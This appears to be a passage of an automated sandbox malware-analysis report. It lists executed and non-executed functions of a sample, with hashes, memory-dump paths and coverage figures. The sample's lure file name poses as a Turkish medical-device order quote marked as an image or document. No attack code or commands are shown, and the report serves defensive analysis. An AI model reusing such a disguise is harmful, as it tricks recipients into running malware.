                                                                                                    • Instruction ID: 973f24a2d7a4d83914fe4543536f0f5cf952379f2990aa601a11b5e8b3335646
                                                                                                    • Opcode Fuzzy Hash: a0111a4c5422bd193505c22581a108b9a77195c035e192733c74b510557edd9d
                                                                                                    • Instruction Fuzzy Hash: 07E0E27185061CDE8B40EEB8D9086DA7BE8AB05224F00C52EE84D9A110EA30D2E8DB81
                                                                                                    Function 075C20D8 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dccc0045ba2897c5118dae9a112b6da2a6d75833fcbbf80d0790749f2d8c15e8
                                                                                                    • Instruction ID: 9dfed834feed4c85992efd4945152e1f2aeef8472666845d8a2ba3d2e741bc36
                                                                                                    • Opcode Fuzzy Hash: dccc0045ba2897c5118dae9a112b6da2a6d75833fcbbf80d0790749f2d8c15e8
                                                                                                    • Instruction Fuzzy Hash: AFD0A7303002098B93006FF669163B677DEFB84605B458029E50AC2281CF28EC019651
                                                                                                    Function 074291EE Relevance: .0, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b14de319016a08a558e6ac6704412ddeb49d6134edacde4e5ee04a857e20b5c5
                                                                                                    • Instruction ID: 7403365506951d0b32f38db6de0829079f4ca4e1a4c1f3a842db718969edfb6a
                                                                                                    • Opcode Fuzzy Hash: b14de319016a08a558e6ac6704412ddeb49d6134edacde4e5ee04a857e20b5c5
                                                                                                    • Instruction Fuzzy Hash: CBD0522040A3D58FC713A33084100DABFB0AEA310034B92EBC0C48E053CA1405AAC362
                                                                                                    Function 075CC0A0 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e167e1417f6eddc83576832461ffd2a2a85fa27f41c63fadf249c6cb8133fbd
                                                                                                    • Instruction ID: 4ed9fd3e509f4c9938bcd9437af3ca6f293b3da7ef697d5f8d2f6f1654a7ab12
                                                                                                    • Opcode Fuzzy Hash: 8e167e1417f6eddc83576832461ffd2a2a85fa27f41c63fadf249c6cb8133fbd
                                                                                                    • Instruction Fuzzy Hash: FCC012E023DA4CCEB104E1E828287FC3A9D768B312F504C1ED60FB2305CAA248101533
                                                                                                    Function 0742921A Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 491db151b5df8564d23db0a6444e3fcd752a03920b7350fcae80e4a8ab2dff05
                                                                                                    • Instruction ID: d3a64694dfbb6dfee0da6c96268071f492e120eb65c9113b6fafd78c96786795
                                                                                                    • Opcode Fuzzy Hash: 491db151b5df8564d23db0a6444e3fcd752a03920b7350fcae80e4a8ab2dff05
                                                                                                    • Instruction Fuzzy Hash: D5D05E3500D2849FCB02CB70D440C95BF70EF06220B1581DBE885CB233C3318919CB50
                                                                                                    Function 075C6681 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cc9197f70979f33d42d9d167ef500bb9103739b36b0dcf15bd323e3e18e5cb63
                                                                                                    • Instruction ID: 84e4e32dd047dee271085545538707be158a4b3f48a2ab229c3e5127eb1ea647
                                                                                                    • Opcode Fuzzy Hash: cc9197f70979f33d42d9d167ef500bb9103739b36b0dcf15bd323e3e18e5cb63
                                                                                                    • Instruction Fuzzy Hash: 17C012A101D3C89FC30217A4B40A1FABF38A40322070608A7E49A8D86389192AE4C7E2
                                                                                                    Function 075CC2EA Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3740c8274e8279738f1d273fce99c4a09d173dca57a24bc9f713cb4c3131b101
                                                                                                    • Instruction ID: 81e2ecc1bbeb9d37850d5a72b5d63fd16604afd5666e63bb54c46d4f1e95eca5
                                                                                                    • Opcode Fuzzy Hash: 3740c8274e8279738f1d273fce99c4a09d173dca57a24bc9f713cb4c3131b101
                                                                                                    • Instruction Fuzzy Hash: FDC08CED06C26CDD4600D2E474293F03B08340B620E000A9FE1CE24C02480300D142B7
                                                                                                    Function 075CE318 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b2492bbc0a2335c6fee87accbf9e7318e987008a4b2e7b412767ab44bbc42e02
                                                                                                    • Instruction ID: 7b67986b3a5b7388c29750deb1673cff5554194631d3428bfbafd490bee1457e
                                                                                                    • Opcode Fuzzy Hash: b2492bbc0a2335c6fee87accbf9e7318e987008a4b2e7b412767ab44bbc42e02
                                                                                                    • Instruction Fuzzy Hash: 2CC08CB0041748CBC31077DCE80E3243268AB41A02F400010E20880020CAA864A0C6A2
                                                                                                    Function 075CBCB0 Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c3338b101d050edee655f730f875361756d1c541615c8fd42271cc27be41206
                                                                                                    • Instruction ID: 975e49f4f8236c6b59e2787f708599200c1bbf8e94aa184ed3bd066fd292283b
                                                                                                    • Opcode Fuzzy Hash: 7c3338b101d050edee655f730f875361756d1c541615c8fd42271cc27be41206
                                                                                                    • Instruction Fuzzy Hash: 1AD012F28181A0DFC300DBA5EDDAD883FF0BE0E34070989CEC0068B222D330A412CB80
                                                                                                    Function 075CC2F0 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb87464bcbd405fa0dde7b4a9317eb7b4f5a79ec036a22d5171f3ef91b79165d
                                                                                                    • Instruction ID: 67fffbd541176790a6d355c7f73ecdba548e471d0507e309c29a78fef1c03786
                                                                                                    • Opcode Fuzzy Hash: eb87464bcbd405fa0dde7b4a9317eb7b4f5a79ec036a22d5171f3ef91b79165d
                                                                                                    • Instruction Fuzzy Hash: CDB012EC03C23CCE4500E1D4702D3F5361C3107B10F400C2EA1CF70900491314520073
                                                                                                    Function 07429228 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                    • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                    • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                    • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                    Function 075C770C Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 06fa9cac179c928f20d4bcffa030c138c9f0228124006771b4f88706e7eda769
                                                                                                    • Instruction ID: ad2bad4f9bf02254014bdf45a119bcc110761b0d5f45b94462874c3c91a12461
                                                                                                    • Opcode Fuzzy Hash: 06fa9cac179c928f20d4bcffa030c138c9f0228124006771b4f88706e7eda769
                                                                                                    • Instruction Fuzzy Hash: 0AB012F61A8509EB9100EBE44C8AB7A6C90FBF6B01F40DD4D374E30460C9B24528D617
                                                                                                    Function 075CB9C1 Relevance: .0, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e965e3cd0a4e9b5c4ea06ea14389c0fd138f06b5b69b782a5b81594354d5a96d
                                                                                                    • Instruction ID: dca6b74c74a72d30fb33f8070c9d495e27709f7d511c2a617d4afe780a8850a9
                                                                                                    • Opcode Fuzzy Hash: e965e3cd0a4e9b5c4ea06ea14389c0fd138f06b5b69b782a5b81594354d5a96d
                                                                                                    • Instruction Fuzzy Hash: 42C04CF0BA021AEFDB11DA91DE47EEC7776BB05A40F224959A60266194D6604501C640
                                                                                                    Function 075C6690 Relevance: .0, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 697c4a8053c907d99588292fb6ea8b5c6db5543c46bdee66b2ce83469dcc1663
                                                                                                    • Instruction ID: 9af2502a30177e1fcb15e868b9ebddcdbc6a6b79804643f5bac82f80b01f2acc
                                                                                                    • Opcode Fuzzy Hash: 697c4a8053c907d99588292fb6ea8b5c6db5543c46bdee66b2ce83469dcc1663
                                                                                                    • Instruction Fuzzy Hash: 1CA011A002828CCE8200A2C8B00A2BABB3CB002208B000808EA0A0C000AAAA3AA080C8
                                                                                                    Function 075CA2B7 Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 11f15a488d16d2860ca5a5a050a5f69a4c13a77201549fa9213d074f602d0c2f
                                                                                                    • Instruction ID: fe3a6865c8f28ceb582a24252d0c8ffa719d0569e95bae8e103d5bf4e1f62def
                                                                                                    • Opcode Fuzzy Hash: 11f15a488d16d2860ca5a5a050a5f69a4c13a77201549fa9213d074f602d0c2f
                                                                                                    • Instruction Fuzzy Hash: 4B9002A6260946963104E1E08C03B655450A6F57047548855171A70554C95090658537

                                                                                                    Non-executed Functions

                                                                                                    Function 07426D08 Relevance: .5, Instructions: 506COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6503f7e51c5d10927bd2fd5b910db68dfa8bd56a79350eadfb29e128771a0a86
                                                                                                    • Instruction ID: c5c1514c4c86ab6e33b9df6ae9ee24fdbe776c8ea18a202fa2e9de88f602a74e
                                                                                                    • Opcode Fuzzy Hash: 6503f7e51c5d10927bd2fd5b910db68dfa8bd56a79350eadfb29e128771a0a86
                                                                                                    • Instruction Fuzzy Hash: 1EF1F4B1700225CFCB1A8B79C4546AE7BA2EFC5700B5644AAE506CB761CB31DC5397A2
                                                                                                    Function 07744B70 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a901e19fd3a50b15eca4389d2c88cb5c2118375a97dfc8fc30f6682f978da31
                                                                                                    • Instruction ID: fff2564332afcca75a096650b73ed3ea3c9bc0934e7fbfd55fcb481de302719b
                                                                                                    • Opcode Fuzzy Hash: 3a901e19fd3a50b15eca4389d2c88cb5c2118375a97dfc8fc30f6682f978da31
                                                                                                    • Instruction Fuzzy Hash: 0DE10AB4E002598FDB14DFA9C580AAEFBF2FF89344F248169D814AB355D7309942CF61
                                                                                                    Function 07743060 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ebb2b6cfd38bd52678ba6b92094a5e4d13198561dc54f86d3fcaf44fb438e01b
                                                                                                    • Instruction ID: 66fa6a80b397b6ab4ab3e678c3fcfbd4b904969640d4c9b43f3df57f2e013bf4
                                                                                                    • Opcode Fuzzy Hash: ebb2b6cfd38bd52678ba6b92094a5e4d13198561dc54f86d3fcaf44fb438e01b
                                                                                                    • Instruction Fuzzy Hash: 5BE1FAB4E002598FDB14DFA9C580AAEFBF2FF89345F248269D418A7355D730A942CF61
                                                                                                    Function 07745868 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b30e788b7e98d729a866cf42524b6cadb16491c3dcef31eafe43a6c2a1c926d0
                                                                                                    • Instruction ID: 68656964675054687a0162f74581b2845c95147cde59bc23b482f558686e8355
                                                                                                    • Opcode Fuzzy Hash: b30e788b7e98d729a866cf42524b6cadb16491c3dcef31eafe43a6c2a1c926d0
                                                                                                    • Instruction Fuzzy Hash: 53E1FAB4E002598FDB14DFA9C580AAEBBF2FF89345F248169D414AB355D7309942CFA1
                                                                                                    Function 077438D0 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 095b710101ca13149839eee2d6033b01a993ea9f62586a406da1182cc00fce16
                                                                                                    • Instruction ID: 2ead5b906e3284e72d5da9cea588bf791f20f9c09a275c0e13c0089cf87b914e
                                                                                                    • Opcode Fuzzy Hash: 095b710101ca13149839eee2d6033b01a993ea9f62586a406da1182cc00fce16
                                                                                                    • Instruction Fuzzy Hash: 40E10AB4E002598FDB14DF99C580AAEBBF2FF89344F248269D418A7355D731A942CFA1
                                                                                                    Function 07743498 Relevance: .3, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ff6e83a0425efaac232cc344f26bce4cf6af65f5da4d3e88a1c277d64f8e2d7
                                                                                                    • Instruction ID: 1ea9cb514473b52d0085d80bb6cc90fd262d717add7d69a3e0cd12890ff7a730
                                                                                                    • Opcode Fuzzy Hash: 4ff6e83a0425efaac232cc344f26bce4cf6af65f5da4d3e88a1c277d64f8e2d7
                                                                                                    • Instruction Fuzzy Hash: B2E1FAB4E002598FDB14DFA9C580AAEFBF2FF89345F248169D418A7355D730A942CFA1
                                                                                                    Function 00F1E124 Relevance: .3, Instructions: 264COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bd305c7414ae349bbd97c7d3580cd1dbd24c1b2422a13e69999fafc4f1b9819d
                                                                                                    • Instruction ID: 3a29555c6ce523018951bd506a73d3c0f443e2c90c4f030c5428958999c852b2
                                                                                                    • Opcode Fuzzy Hash: bd305c7414ae349bbd97c7d3580cd1dbd24c1b2422a13e69999fafc4f1b9819d
                                                                                                    • Instruction Fuzzy Hash: 3EA15D32E002099FCF09DFA4C8445DEB7B2FF85310B15857AE906BB265DB35E95ADB80
                                                                                                    Function 05F26BB0 Relevance: .3, Instructions: 264COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2255615905.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_5f20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 29084509dd55d2d0b9433fa42a12610fe8405947740f6e404755e82514bf1dcd
                                                                                                    • Instruction ID: aafb07ea7eb91cd6cfd4bf2abe92363441eb77b875829e806ebe43c9b91f8462
                                                                                                    • Opcode Fuzzy Hash: 29084509dd55d2d0b9433fa42a12610fe8405947740f6e404755e82514bf1dcd
                                                                                                    • Instruction Fuzzy Hash: B8D10A3192075ACACB11EBA4D89069DB7B1FFD5300F10DB9AE54937220EFB06AC5CB81
                                                                                                    Function 05F26BAF Relevance: .3, Instructions: 262COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2255615905.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_5f20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a290236fb35004c04afbe3fc708ccd763970e15e8011492d445812d9a829a014
                                                                                                    • Instruction ID: fb2d35d3569d6e503857ee82587a939ac1f34b9260b10ac0d5059ce0cdded73b
                                                                                                    • Opcode Fuzzy Hash: a290236fb35004c04afbe3fc708ccd763970e15e8011492d445812d9a829a014
                                                                                                    • Instruction Fuzzy Hash: 80D10A3592075ACACB11EBA4D95069DB771FFD5300F10DB9AE54937220EFB06AC5CB81
                                                                                                    Function 0774302D Relevance: .2, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b5406e1679781632b84cb77f2b798dcd7448d983b928cd70419767503ac652b
                                                                                                    • Instruction ID: 8ffe5c3fe89c1beb4dd425548e033ccd44ae44442a69d8607401df54c349106c
                                                                                                    • Opcode Fuzzy Hash: 9b5406e1679781632b84cb77f2b798dcd7448d983b928cd70419767503ac652b
                                                                                                    • Instruction Fuzzy Hash: 375140B0E042598FDB15CF69C5405AEBBF2BF89300F14C5AAD418BB256C7349A42CFA1
                                                                                                    Function 07743489 Relevance: .1, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 577eb05ec8ec59daa898fb5eb3d8ecb56236672ef72d33a4c8e0b19e88b1a329
                                                                                                    • Instruction ID: 725c6631936a4b1b108594f9aaf80d955f9c96efa87ae3590495226844260e8a
                                                                                                    • Opcode Fuzzy Hash: 577eb05ec8ec59daa898fb5eb3d8ecb56236672ef72d33a4c8e0b19e88b1a329
                                                                                                    • Instruction Fuzzy Hash: C0512AB0E002198BDB14CFA9C5805AEFBF2BF89304F24C169D418A7356D7309942CFA1
                                                                                                    Function 07744B60 Relevance: .1, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4cf237691fd943644fd321b5cd47c261c261000d4cd96c7f5716cf4419aa8c87
                                                                                                    • Instruction ID: 2f24e47074a5fa07c7fa91b39a62205e6a225aceb3438137fe2effe3bbce921b
                                                                                                    • Opcode Fuzzy Hash: 4cf237691fd943644fd321b5cd47c261c261000d4cd96c7f5716cf4419aa8c87
                                                                                                    • Instruction Fuzzy Hash: 0C511AB4E002598BDB14CFA9C5806AEFBF2FF89350F24C169D418AB356D7359942CFA1

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:12.6%
                                                                                                    Dynamic/Decrypted Code Coverage:95.4%
                                                                                                    Signature Coverage:3.3%
                                                                                                    Total number of Nodes:151
                                                                                                    Total number of Limit Nodes:20
